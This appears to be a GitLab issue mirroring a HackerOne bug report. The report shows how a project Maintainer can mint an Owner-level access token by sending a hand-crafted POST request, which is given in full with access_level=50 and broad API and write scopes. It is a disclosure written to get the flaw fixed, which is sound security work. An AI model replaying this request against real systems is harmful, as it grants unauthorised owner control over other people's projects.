Maintainer user can become owner of project
HackerOne report #1805549 by shubham_sohi
on 2022-12-14, assigned to @fvpotvin:
Report | Attachments | How To Reproduce
Report
Summary
I have found a way that can be used by low privileged user to become owner of project.
NOTE:-
You need a premium GitLab account to verify the issue.
Steps to reproduce
1.Login into admin account.
2.Go to https://gitlab.com/projects/new
and click on create blank project and create a project with name P.
3.Now in project P go to Project Information>Members
and invite user A with Maintainer
role.
4.Now login into user A account.
5.In project P Go to Settings>Access Tokens
, here user A can create access token.
6.But user A can only create access token for role Maintainer, Guest, Reporter and developer but does not have permission to create access token for owner role.
7.Now run below request in user A account with group_name and project_P_name.
POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2
Host: gitlab.com
Content-Length: 444
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: { REDACTED }
X-Csrf-Token: { REDACTED }
resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry
8.In response you will get new access token.
9.Now you can use this token to perform all action in project as admin.
Impact
Maintainer
role user get owner privilege.
What is the expected correct behavior?
Maintainer role user should only able to create access token for Maintainer, Guest, Reporter and developer .
Output of checks
This bug happens on GitLab.com
Impact
Maintainer
role user get owner privilege.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: